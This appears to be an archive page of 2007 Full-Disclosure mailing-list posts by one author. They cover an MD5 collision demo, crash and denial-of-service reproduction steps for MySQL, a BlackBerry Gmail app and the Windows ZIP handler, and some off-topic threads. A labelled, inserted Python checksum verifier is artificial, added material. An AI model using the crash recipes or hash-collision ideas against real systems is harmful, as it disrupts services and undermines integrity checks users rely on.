SetStdHandle
CloseHandle
KERNEL32.dll
Goodbye World :-(

[EMAIL PROTECTED]:/tmp$ md5sum HelloWorld-colliding.exe | awk '{print $1}' | tee hw
18fcc4334f44fed60718e7dacd82dddf
[EMAIL PROTECTED]:/tmp$ md5sum GoodbyeWorld-colliding.exe | awk '{print $1}' | tee gw
18fcc4334f44fed60718e7dacd82dddf
[EMAIL PROTECTED]:/tmp$ cmp hw gw
[EMAIL PROTECTED]:/tmp$ echo $?
0

There you have it. Surely a GPL'd tool implementing this attack style will be available shortly. And since Chinese researchers have been attacking SHA-1 lately, should SHA-256 be considered the proper replacement? I am unsure :-(

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
Re: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
On Dec 1, 2007 7:08 PM, [EMAIL PROTECTED] wrote:
> Admittedly, MD5 is on its last legs. However, please note that the current state of the art for MD5 collisions is create two plaintexts that collide with the same (but unpredictable) MD5 hash. That's what these binaries demonstrate.

Correct...

> What is still *not* known to be doable is given a plaintext that has a pre-specified MD5 hash, compute a second plaintext with the same hash. So publishing the MD5 hash of the binary is still safe - for now.

But is it? Let's create a thought experiment. Let us first assume that an internal security product release engineer has access to the source code, the product binaries, and is responsible for creating ISO images and MD5 hashes to accompany them for distribution to government agencies which will utilize the security product internally. OK, now let's say that this release engineer wants to create two different ISO images, each with a different AUTORUN feature on the disc. Since he has the ability to choose the hash here, then we must therefore conclude that MD5 will not actually ensure that the disc is legitimate and unaltered. Now, such an attack is not as sexy as colliding with a pre-formed MD5 hash, but we do know that approximately 70% of exploited security issues somehow involve internal personnel.

> If I was a vendor, I'd be publishing both MD5 and SHA-256 for the data.

So my question to you then is why even bother with MD5, and not just choose to use SHA-256 instead? In fact, I might even go so far to say that future Linux distributions should stop including the md5sum program in default installations. I say this because it correlates with the secure by default motto. If the user really needs md5sum, they can install it separately. The only issue is that both applications are included in coreutils, so it is unlikely that they would ever be separated.

> (Note that strictly speaking, what you *really* want is a PGP-signed or otherwise authenticated MD5/SHA-256 hash. Otherwise, if I'm an attacker, I can just splat a new binary up, and a new MD5SUMS file that lists the MD5 sum for the backdoored binaries. If anything, more people manage to screw *this* part up than the much lesser offense of still using MD5 rather than something from the SHA-2 family)

Yeah, storing your MD5 and binary on the same asset is just like keeping your important security logs on a system that was just compromised. Your data is tainted...

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
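Added example, not part of the thread and not code from either poster: a download verifier that accepts only SHA-256 manifest entries and checks that the manifest itself is authentic, covering both the retire-MD5 point of the original post and the authenticated-hash point of this reply. The manifest format, file names and key are constructed for illustration, and HMAC-SHA256 stands in for the detached PGP signature the reply mentions.

```python
import hashlib
import hmac

ACCEPTED_ALGOS = {"sha256"}  # md5 and sha1 are deliberately not accepted


def build_manifest(files):
    """Return checksum lines of the assumed form 'sha256 <hexdigest> <name>'."""
    return "\n".join(
        f"sha256 {hashlib.sha256(data).hexdigest()} {name}"
        for name, data in sorted(files.items())
    )


def authenticate(manifest, key):
    """Tag the manifest. HMAC is a stand-in here: a real release process would
    use a public-key signature so that verifiers hold no signing secret."""
    return hmac.new(key, manifest.encode(), hashlib.sha256).hexdigest()


def verify(name, data, manifest, tag=None, key=None):
    """Check one downloaded file against a manifest and return a status string.
    When a key is supplied, the manifest must carry a valid tag first."""
    if key is not None:
        expected = authenticate(manifest, key)
        if tag is None or not hmac.compare_digest(expected, tag):
            return "MANIFEST_NOT_AUTHENTIC"
    for line in manifest.splitlines():
        parts = line.split(" ", 2)
        if len(parts) != 3 or parts[2] != name:
            continue
        algo, digest, _ = parts
        if algo not in ACCEPTED_ALGOS:
            return "WEAK_ALGORITHM"
        actual = hashlib.new(algo, data).hexdigest()
        return "OK" if hmac.compare_digest(actual, digest) else "DIGEST_MISMATCH"
    return "NOT_LISTED"


def demo():
    """Run the cases discussed in the thread on constructed data."""
    key = b"constructed-demo-key"  # known only to the vendor's release step
    good = b"constructed release image v1.0"
    manifest = build_manifest({"product.iso": good})
    tag = authenticate(manifest, key)

    # Binary and checksum file stored on the same host are replaced together.
    swapped = b"constructed image with a different AUTORUN"
    swapped_manifest = build_manifest({"product.iso": swapped})

    legacy = "md5 " + "0" * 32 + " product.iso"  # constructed MD5-only entry
    return {
        "genuine, authenticated": verify("product.iso", good, manifest, tag, key),
        "swapped pair, digest only": verify("product.iso", swapped, swapped_manifest),
        "swapped pair, authenticated": verify("product.iso", swapped, swapped_manifest, tag, key),
        "swapped binary, old manifest": verify("product.iso", swapped, manifest, tag, key),
        "md5-only manifest": verify("product.iso", good, legacy),
    }


if __name__ == "__main__":
    for case, status in demo().items():
        print(f"{case:32} {status}")
```

The "swapped pair, digest only" case returns OK, which is the failure the reply describes: a checksum file stored beside the binary proves nothing once both can be rewritten.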
[Full-disclosure] MySQL 5.x DoS (unknown)
My roommate Joe Gallo found this one today while tediously laboring away at blinkx (video search engine), but I think it is funny, and could be used to crash local/remote databases due to an assertion in MySQL that fails and results in SIGABRT/signal-6 to occur on non-indexed tables...have phun :-)

http://bugs.mysql.com/bug.php?id=32125

--
Kristian Erik Hermansen
[Full-disclosure] Gmail 1.1.0 for BlackBerry remote DoS
I have tested and confirmed this bug on a BlackBerry 8700c in a repeatable fashion. Three outcomes are common (so may be race condition)...

1) Entire BlackBerry OS freeze. (On soft-reboot, you will see the uncaught Java exception for Gmail app)
2) Gmail freezes for some time, and then OS can recover (Gmail not responding, and killed)
3) Or no DoS at all (if you are lucky)

Here is the message you will get...

Uncaught exception: Application gm_8700_v4_0_L1(147) is not responding; process terminated

The way I have commonly invoked this is to send an email of at least 20k in size to Exchange-synced email address on the same device. If the user has Gmail account open, it is more likely to go into DoS condition if you are composing an email or replying to a large thread. Maybe this is due to Gmail trying to auto-save the draft at the same time and hanging?

Also, how is the hacker community debugging BlackBerry apps for security issues? ie, can I remotely debug the processes via USB on the 8700c? Thanks in advance...

PS -- Oh, I just thought that since we are talking about BlackBerry, I should mention another funny bug, but not a security issue. It has to do with multi-byte character manipulation... Tested on 8700c v4.2.1.96 (Platform 2.3.0.79). Follow these steps to reproduce the Arabic array index out of bounds exception when making a phone call...

Home - Settings - Options - Language - Change Option - Arabic (funky chars, top item in list) - Save
Home - [do this next part quickly] tap 9, tap 0 quickly twice, while char is still highlighted tap DEL.

Uncaught exception: java.lang.StringIndexOutOfBoundsException

--
Kristian Erik Hermansen
[Full-disclosure] Microsoft Windows default ZIP handler bug
I tested this on three Windows XP machines and was able to make them all crash. There is an issue with the way Microsoft's default compressed file handler deals with embedded compressed files. I don't have much time to investigate further, since I am in Atlanta all this week for SPICON and don't have any tools on my corp laptop :-( However, I put together a Flash video showing the bug. It may not be exploitable, but I also haven't been keeping up with the latest bad pointer / alternate code path research stuff. Maybe someone can do some ninjitsu code exec using this...

Video: http://kristian-hermansen.com/hacks/microsoft-windows-default-compressed-file-handler-crasher-2.swf
File: http://kristian-hermansen.com/hacks/.zip

--
Kristian Erik Hermansen
Re: [Full-disclosure] Microsoft Windows default ZIP handler bug
On 10/15/07, 3APA3A [EMAIL PROTECTED] wrote:
> Can not reproduce it on patched Windows XP. May be it's DynaZIP library buffer overflows fixed with MS04-34.

I think it should work. Try this and let me know if the ZIP handler crashes...

* Open .zip
* Then the .zip embedded within
* Click the UP-DIRECTORY button
* Crash ...

It may be possible to exploit this without any user interaction, for instance, while extraction is occurring. Or, it may also be possible to integrate a path similar to the '..' tar traversal that was published recently. I have no idea. If you find that it does crash on your latest updated XP, let us know...

--
Kristian Erik Hermansen
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
So one example is that you are in a wifi cafe and you want to browse sites which may be available on both http and https. One example is when you browse google calendar. By default you will get http even after logging in over https. It doesn't really matter anyways and I should just code this up for myself. I was just wondering if something already existed...that whole code reuse concept...you know :-/

On 10/12/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> On Fri, 12 Oct 2007 15:06:14 PDT, Kristian Erik Hermansen said:
>> I just wanted to clarify that I am looking for an extension that will rewrite all encountered HTTP references in Firefox to HTTPS. I would already have a firewall or some other layer7 filtering device blocking unencrypted traffic. The addon Better Gmail does something similar to this, with the force HTTPS option, but not exactly...
>
> What should this hypothetical extension do if it automagically redirects http: to https:, but the target server is something that is only listening on port 80 because it doesn't have https: enabled? https://www.cnn.com just sorta sits there for me.

--
Kristian Erik Hermansen
[Full-disclosure] extension for Firefox to force HTTPS always?
Sometimes when pen-testing you don't want to leak any unencrypted data. Is there a Firefox extension that forces all content over HTTPS to ensure such security?

--
Kristian Erik Hermansen
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
I just wanted to clarify that I am looking for an extension that will rewrite all encountered HTTP references in Firefox to HTTPS. I would already have a firewall or some other layer7 filtering device blocking unencrypted traffic. The addon Better Gmail does something similar to this, with the force HTTPS option, but not exactly...

--
Kristian Erik Hermansen
[Full-disclosure] Core Impact 7.5 Web App pen-testing framework, as good as the hype?
Has anyone upgraded to Core Impact 7.5 and utilized the web application pen-testing framework? And if so, do you have any thoughts on it? Good? Bad? Evil? Not worth the hype? Etc? Any other vendors do it better? Have any issues with large sites? What makes it so special? Any input is appreciated.

If you have questions about CI 7.x itself, I can give you some info from my experience with the product over the past three years as well if you would like to take the discussion offline and not flood this list...

--
Kristian Erik Hermansen
Re: [Full-disclosure] [Dailydave] Hacking software is lame -- try medical research...
On 9/22/07, Jimby Sharp [EMAIL PROTECTED] wrote:
> I had a wonderful breakfast, two eggs and sandwich. :-) I am flying to New York today. Can anyone tell me any good mall or store where I can buy a good sleeping bag? A last question, is the book Atlas Shrugged by Ayn Rand worth reading?
> - Jimby
> P.S. Well, everyone is jumping into FD to discuss their favorite topic, so i thought I might try as well.

full-disclosure of your life is permitted according to the FD mailing list guidelines. Now please list your SSN, credit card numbers, last three previous addresses, and the hotel where you will be staying in New York so I can come visit you :-)

--
Kristian Erik Hermansen
[Full-disclosure] Hacking software is lame -- try medical research...
Some interesting discussion came up on some security lists this week and it got me to thinking. Yes, hacking software is lame. Cool, so you found some vulnerabilities in some widely distributed application, service, or OS and it is patched just as quickly. Why don't we spend our time and valuable energy researching cures for rare or popular diseases instead? For instance, my brother (Jon Hermansen) has a very rare disease called Langerhans Cell Histiocytosis. It is also better known as LCH. It can be identified as causing such further diseases as Diabetes Insipidus, which is also uncommon (not sugar diabetes). Have you heard of these diseases before? Let me educate you…

General Information:
http://en.wikipedia.org/wiki/Langerhans_cell_histiocytosis
http://en.wikipedia.org/wiki/Diabetes_insipidus

Seven Part Video Series:
http://youtube.com/watch?v=KkBRqZS8nfM
http://youtube.com/watch?v=w1h6ZjxF-To
http://youtube.com/watch?v=0ojbJpERlt8
http://youtube.com/watch?v=dzUqdYofMCQ
http://youtube.com/watch?v=lNhzwNYhi0M
http://youtube.com/watch?v=nY9DDEhShcE
http://youtube.com/watch?v=5_8SEYyEZGI

And even worse than this, a friend of mine who is a PhD student in Math at Berkeley has an even rarer disease known as Gaucher's Disease. This costs $550,000 / year to treat. That's a hefty bill every year (you make that much doing security vulns?), and some insurance companies might refuse to accept you due to pre-existing conditions. So guess what, my friend does not have health insurance and has not been treated for two years. A genius might die. That's ludicrous.

http://en.wikipedia.org/wiki/Gaucher's_disease
http://youtube.com/watch?v=0nX6QM5iVaU

If we consider ourselves decent hackers, why don't we put our efforts toward helping cure this and other diseases rather than some very simple programming vulnerability? Is it because then we would have to reinvent a whole new slew of tools and re-orient/re-educate ourselves to be successful? Think about it…

--
Kristian Erik Hermansen
Re: [Full-disclosure] [Dailydave] Hacking software is lame -- try medical research...
On 9/21/07, Curt [EMAIL PROTECTED] wrote:
> I notice that you didn't mention any rare disease that none of your friends or relatives have. Why is it that all of these altruistic people seem to never give a crap until it happens to them? Did Michael J Fox give one thin dime to Parkinsons until he had it? How about Christopher Reeves and spinal injury/stem cell? I'd much rather make my money, and donate to non-profit orgs that do things that I am interested in.

You make some great points -- but I think you jumped the gun on assuming I am evil. Friends and people who know me understand that I am active in many circles, offering help to those in need. I highly encourage you to do the same so that we can live in a world where people are friendlier and healthier. The world is what we make of it, and I always disliked the hostility in the security and free software communities. Everyone should be nicer to each other and not bash people when they ask simple questions, even if they haven't read the manual...

--
Kristian Erik Hermansen
[Full-disclosure] Google Tracking
It appears to me that Google has the ability to know nearly all the sites you have visited because many larger web presences utilize Google Analytics. What this means is that Google is continually compiling data on every visitor across the Internet. If they like, they should have the ability to tie this to any Google services account you operate. Thus, perhaps they can search your Google user id and see nearly all the web sites you have ever visited across the Internet (not necessarily using their search engine, mind you). Pretty cool, or scary, depending on which side of the fence you sit.

Now, correct me if I am wrong here, but I would like to hear from anyone who utilizes Google Analytics and believes this is not the case. Does the EULA suggest that Google is not tracking users across the entire Internet? Just a random thought I had. Maybe this is widely known and everyone has taken proactive measures to hide this data from Google already. It is merely as simple as blocking the domain. Maybe there is a more elegant way to do it?

--
Kristian Erik Hermansen
Re: [Full-disclosure] DEFCON 15 and Blackhat 2007 presentations iso CDs ?
Not ISO's, but lots of good video material...

http://mirrors.easynews.com/blackhat/
http://mirrors.easynews.com/defcon/
http://mirrors.easynews.com/

--
Kristian Erik Hermansen